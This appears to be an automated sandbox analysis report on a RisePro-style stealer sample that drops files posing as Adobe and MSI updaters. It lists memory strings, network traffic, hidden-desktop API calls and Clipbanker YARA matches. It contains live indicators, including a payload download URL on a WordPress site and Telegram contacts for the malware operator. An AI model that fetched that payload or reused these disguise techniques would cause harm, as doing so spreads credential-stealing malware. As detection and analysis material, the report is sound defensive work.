Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000002.4493331153.0000000003337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.exif/1U
Source: file.exe, 00000000.00000002.4493331153.0000000003337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.microsofo/1.2/
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4491758159.0000000000C32000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
Source: file.exe, 00000000.00000002.4492597224.00000000016E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52z
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/
Source: file.exe, 00000000.00000003.2282645633.00000000066A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exei
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282645633.00000000066A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282645633.00000000066A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exey4
Source: file.exe, 00000000.00000002.4492597224.0000000001691000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.4491758159.0000000000C32000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://ipinfo.io/Content-Type:
Source: file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4492597224.00000000016BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/j
Source: file.exe, 00000000.00000002.4492597224.0000000001691000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/sR
Source: file.exe, 00000000.00000002.4492597224.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
Source: file.exe, 00000000.00000002.4492597224.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52J-
Source: file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52e
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: https://sectigo.com/CPS0
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.4493848204.0000000006306000.00000004.00000020.00020000.00000000.sdmp, Xfp4MT9n1IFhi1hjXC4bx59.zip.0.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.4491758159.0000000000C32000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2112251123.0000000006658000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000003.2104922518.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109005267.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2102572672.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2097822313.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105271623.00000000062F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107651287.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/n
Source: file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/txt-
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC, 0_2_0712C230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07109080 OpenDesktopA,CreateDesktopA, 0_2_07109080

System Summary

Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2664724188.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000007.00000002.2225780219.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2581861448.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000015.00000002.2271675447.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.4491626286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2280442151.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000018.00000002.2338388724.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2280260250.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.2418733700.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.2502350940.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000009.00000002.2237350330.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2241108576.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess, 0_2_0710C480
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: C:\Users\user\Desktop\file.exe Code function: String function: 07146140 appears 58 times
Source: file.exe Static PE information: invalid certificate
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2207103891.0000000006E66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2258565037.00000000070E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2262863469.00000000070E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2206091621.0000000006E6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000000.2030040447.00000000011D7000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs file.exe
Source: file.exe, 00000000.00000003.2259863441.00000000070E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2210534048.0000000006E6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameHxInstallerBackground.dll@ vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
